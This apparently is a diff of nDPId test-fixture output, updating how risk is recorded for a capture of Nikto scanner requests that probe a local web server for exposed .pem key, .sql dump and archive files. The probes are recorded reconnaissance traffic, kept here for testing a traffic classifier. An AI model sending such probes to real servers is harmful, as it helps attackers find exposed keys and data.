 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276908,"pkt":"AAAAAAAAAAAAAAAACABFAAC9umJAAEAGgdZ\/AAABfwAAAcK8H5Cw+YIsSeaYa4AYAED+sQAAAQEICp1m+9SdZvvUR0VUIC8wLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276910,"pkt":"AAAAAAAAAAAAAAAACABFAADDPvVAAEAG\/T1\/AAABfwAAAcK+H5Bg7Aa5zb6cN4AYAED+twAAAQEICp1m+9adZvvWR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276912,"pkt":"AAAAAAAAAAAAAAAACABFAADDm5RAAEAGoJ5\/AAABfwAAAcLAH5Ba3KPftqtSlIAYAED+twAAAQEICp1m+9edZvvXR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276913,"pkt":"AAAAAAAAAAAAAAAACABFAADCN0tAAEAGBOl\/AAABfwAAAcLCH5DYOQ8GBjLTAIAYAED+tgAAAQEICp1m+9mdZvvZR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276916,"pkt":"AAAAAAAAAAAAAAAACABFAADCczVAAEAGyP5\/AAABfwAAAcLEH5BP20t\/\/3FheoAYAED+tgAAAQEICp1m+9ydZvvcR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276917,"pkt":"AAAAAAAAAAAAAAAACABFAADDZ9VAAEAG1F1\/AAABfwAAAcLGH5AZz1+f4E8iK4AYAED+twAAAQEICp1m+92dZvvdR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276919,"pkt":"AAAAAAAAAAAAAAAACABFAADDxTFAAEAGdwF\/AAABfwAAAcLIH5D+g\/1jHP616oAYAED+twAAAQEICp1m+9+dZvveR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276920,"pkt":"AAAAAAAAAAAAAAAACABFAADFpeFAAEAGlk9\/AAABfwAAAcLKH5AnGp2SsuR1gYAYAED+uQAAAQEICp1m++CdZvvgR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
